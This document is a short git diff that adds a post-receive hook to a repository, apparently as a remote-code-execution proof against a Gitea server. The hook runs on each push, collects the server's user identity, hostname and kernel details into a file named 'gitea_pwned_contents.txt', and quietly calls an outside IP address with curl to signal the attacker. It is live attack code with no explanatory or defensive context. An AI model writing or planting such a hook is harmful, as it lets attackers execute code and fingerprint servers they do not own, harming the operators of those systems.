diff --git a/hooks/post-receive b/hooks/post-receive new file mode 100644 index 0000000..fd2845d --- /dev/null +++ b/hooks/post-receive @@ -0,0 +1,3 @@ +#!/bin/sh +(id;whoami;hostname;uname -a) > /tmp/gitea_pwned_contents.txt 2>&1 +curl -s http://202.79.169.91:28016/rce_contents_hook 2>/dev/null &